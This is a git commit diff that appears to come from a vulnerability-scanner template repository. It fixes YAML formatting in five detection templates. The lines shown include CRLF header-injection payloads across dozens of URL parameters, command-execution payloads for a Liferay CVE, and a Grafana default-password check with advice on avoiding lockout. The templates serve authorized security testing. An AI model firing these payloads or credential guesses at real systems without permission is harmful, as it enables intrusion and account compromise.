fix minor yamllint issues

Fix minor yamllint issues to move forward.
2020-08-25 22:18:58 +02:00 · 2020-08-25 22:18:58 +02:00 · 146e114a3b
parent 86ca65e056
commit 146e114a3b
5 changed files with 16 additions and 18 deletions
--- a/cves/CVE-2017-10075.yaml
+++ b/cves/CVE-2017-10075.yaml
@ -4,10 +4,9 @@ info:
  name: Oracle Content Server XSS
  author: madrobot
  severity: medium
-  description: >
-  The vulnerability can be used to include
-  HTML- or JavaScript code to the affected web page. The code is executed
-  in the browser of users if they visit the manipulated site.
+  description: The vulnerability can be used to include
+    HTML- or JavaScript code to the affected web page. The code is executed
+    in the browser of users if they visit the manipulated site.

 requests:
  - method: GET
--- a/cves/CVE-2020-7961.yaml
+++ b/cves/CVE-2020-7961.yaml
@ -15,9 +15,9 @@ info:
 requests:
  - payloads:
      command:
-        - "systeminfo" # Windows
-        - "lsb_release -a" # Linux
-        - "sysctl kern.ostype" # macOS
+        - "systeminfo"  # Windows
+        - "lsb_release -a"  # Linux
+        - "sysctl kern.ostype"  # macOS
      port:
        - "80"
        - "443"
--- a/default-credentials/grafana-default-credential.yaml
+++ b/default-credentials/grafana-default-credential.yaml
@ -5,16 +5,15 @@ info:
  severity: high

 requests:
-
-    # https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
-    # https://github.com/grafana/grafana/issues/14755
-    # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
-    # So make sure, not to attempt more than 4 password for same valid user.
+  # https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
+  # https://github.com/grafana/grafana/issues/14755
+  # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
+  # So make sure, not to attempt more than 4 password for same valid user.

  - payloads:

-    # grafana_username:
-    #  - admin
+      # grafana_username:
+      #  - admin

      grafana_password:
        - prom-operator
--- a/vulnerabilities/crlf-injection.yaml
+++ b/vulnerabilities/crlf-injection.yaml
@ -10,12 +10,12 @@ requests:
  - method: GET
    path:
      - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection"
-      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass
+      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection"  # unicode bypass
      - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection"
      - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
      - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection"
-      - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache
-      - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975
+      - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.."  # Apache
+      - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection"  # CVE-2016-4975
      - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection"

    matchers:
--- a/vulnerabilities/tikiwiki-reflected-xss.yaml
+++ b/vulnerabilities/tikiwiki-reflected-xss.yaml
@ -5,7 +5,7 @@ info:
  author: madrobot
  severity: medium
  description: todo
-  
+
 requests:
  - method: GET
    path: